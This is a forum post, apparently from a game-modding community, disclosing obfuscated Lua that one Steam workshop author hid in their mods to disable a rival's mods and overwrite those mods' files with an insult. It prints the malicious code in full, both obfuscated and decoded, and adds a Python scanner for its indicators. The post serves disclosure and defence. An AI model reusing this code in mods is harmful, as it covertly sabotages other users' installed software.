Steam user DYC put malicious and obfuscated code in their mods that would modify modindex.lua file, adding the following line at the end of the file:

 local wtxt12 = function(p, txt)      local fo = io.open      local f, err = fo(p, "w" )      if err then      else          f:write(txt)          f:close()      end  end  local key1 = "\121\105\121\117" local key2 = "\231\191\188\232\175\173" local sbwss={ "642704851", "701574438", "834039799", "845740921", "1088165487", "1161719409", "1546144229", "1559975778", "1626938843", "1656314475", "1656333678", "1883082987",  "2199037549203167410", "2199037549203167802", "2199037549203167776", "2199037549203167775", "2199037549203168585", } local sbstr = "\229\155\160\230\129\182\230\132\143\231\175\161\230\148\185\228\187\150\228\186\186\109\111\100\232\162\171\229\176\129\231\166\129\239\188\140\230\138\181\229\136\182\115\98\228\189\156\232\128\133\239\188\129" local CheckSB = function (name) if name and (string.find(string.lower(name), key1 , 1, true) or string.find(string.lower(name), key2 , 1, true)) then return true end for k,v in pairs(sbwss) do if name and name=="workshop-"..v then return true end end return false end local AntiSB = function (name) local file1 = "../mods/"..name.."/modmain.lua" local file2 = "../mods/"..name.."/modworldgenmain.lua" wtxt12(file1, sbstr ) wtxt12(file2, sbstr ) end  if _G.KnownModIndex and _G.KnownModIndex.GetModInfo then      local OldFn = KnownModIndex.GetModInfo      KnownModIndex.GetModInfo = function( self, modname, ...)  local info=self.savedata.known_mods[modname] and self.savedata.known_mods[modname].modinfo or {} if CheckSB(info.name) or CheckSB(info.author) then KnownModIndex:DisableBecauseBad(modname) AntiSB(modname) info.restart_required=false return info else return OldFn( self, modname, ...)  end     end  end  

Once deobfuscated, it reads:

local wtxt12 = function(p, txt)
    local fo = io.open
    local f, err = fo(p, "w")
    if err then
    else
        f:write(txt)
        f:close()
    end
end
local key1 = "\121\105\121\117" -- yiyu
local key2 = "\231\191\188\232\175\173" -- 翼语
local sbwss = {
    "642704851",
    "701574438",
    "834039799",
    "845740921",
    "1088165487",
    "1161719409",
    "1546144229",
    "1559975778",
    "1626938843",
    "1656314475",
    "1656333678",
    "1883082987",
    "2199037549203167410",
    "2199037549203167802",
    "2199037549203167776",
    "2199037549203167775",
    "2199037549203168585"
}
local sbstr =
    "\229\155\160\230\129\182\230\132\143\231\175\161\230\148\185\228\187\150\228\186\186\109\111\100\232\162\171\229\176\129\231\166\129\239\188\140\230\138\181\229\136\182\115\98\228\189\156\232\128\133\239\188\129" -- foul language
local CheckSB = function(name)
    if name and (string.find(string.lower(name), key1, 1, true) or string.find(string.lower(name), key2, 1, true)) then
        return true
    end
    for k, v in pairs(sbwss) do
        if name and name == "workshop-" .. v then
            return true
        end
    end
    return false
end
local AntiSB = function(name)
    local file1 = "../mods/" .. name .. "/modmain.lua"
    local file2 = "../mods/" .. name .. "/modworldgenmain.lua"
    wtxt12(file1, sbstr)
    wtxt12(file2, sbstr)
end
if _G.KnownModIndex and _G.KnownModIndex.GetModInfo then
    local OldFn = KnownModIndex.GetModInfo
    KnownModIndex.GetModInfo = function(self, modname, ...)
        local info = self.savedata.known_mods[modname] and self.savedata.known_mods[modname].modinfo or {}
        if CheckSB(info.name) or CheckSB(info.author) then
            KnownModIndex:DisableBecauseBad(modname)
            AntiSB(modname)
            info.restart_required = false
            return info
        else
            return OldFn(self, modname, ...)
        end
    end
end

Essentially, this script attacks mods made by another Steam user, Yiyu (翼语), where sbwss are the workshop item IDs of their mods. It modifies files of said mod, causing it to crash.

 Enabling any of these mods will inject your modindex.lua file with malicious code:

 

@JoeW Please enforce the workshop rules, this happened ages ago yet is still unresolved, it's not like it wasn't known at the time so... please do something :concern:

 

Note, Yiyu is not innocent here, apparently they also made some malicious code but I can't be bothered to look up more obfuscated code filled with foul language, so that's someone else's job
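
For anyone checking their own install, the behaviours visible in the snippet above can be searched for in modindex.lua or in a mod's Lua files. The following is an added example, not part of the original post or of any Klei tool: the indicator names and regexes are this example's own choices, and SAMPLE is a handful of lines excerpted from the code quoted in the post.

```python
import re

# Indicators drawn from the behaviour shown in the post (names/regexes are this example's own).
INDICATORS = {
    "replaces KnownModIndex.GetModInfo": re.compile(r"KnownModIndex\.GetModInfo\s*=\s*function"),
    "calls DisableBecauseBad": re.compile(r"DisableBecauseBad\s*\("),
    "builds a path under ../mods/": re.compile(r"""["']\.\./mods/"""),
    "opens a file in write mode": re.compile(r"""\(\s*[^,()]+,\s*["']w["']\s*\)"""),
}
# A string literal made up only of \ddd decimal escapes (four or more of them).
ESCAPED_ONLY = re.compile(r'"((?:\\\d{1,3}){4,})"')

def decode_lua_escapes(body: str) -> str:
    """Turn Lua \\ddd decimal escapes into the UTF-8 text they spell.

    Simplification: an escaped backslash followed by digits is not special-cased.
    """
    def repl(m):
        n = int(m.group(1))
        return bytes([n]) if n < 256 else m.group(0)  # Lua rejects values above 255
    raw = re.sub(rb"\\(\d{1,3})", repl, body.encode("utf-8"))
    return raw.decode("utf-8", errors="replace")

def scan(text: str):
    """Return (matched indicator names, decoded escape-only string literals)."""
    findings = [name for name, rx in INDICATORS.items() if rx.search(text)]
    hidden = [decode_lua_escapes(m.group(1)) for m in ESCAPED_ONLY.finditer(text)]
    return findings, hidden

# Lines excerpted from the snippet quoted in the post.
SAMPLE = r'''
local fo = io.open
local f, err = fo(p, "w" )
local key1 = "\121\105\121\117"
local key2 = "\231\191\188\232\175\173"
local file1 = "../mods/"..name.."/modmain.lua"
KnownModIndex.GetModInfo = function( self, modname, ...)
KnownModIndex:DisableBecauseBad(modname)
'''

if __name__ == "__main__":
    findings, hidden = scan(SAMPLE)
    for name in findings:
        print("indicator:", name)
    for text in hidden:
        print("decoded string:", text)
```

Mods that legitimately write files will match the write-mode indicator on their own, so treat a hit as a prompt to read the surrounding code rather than as a verdict.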
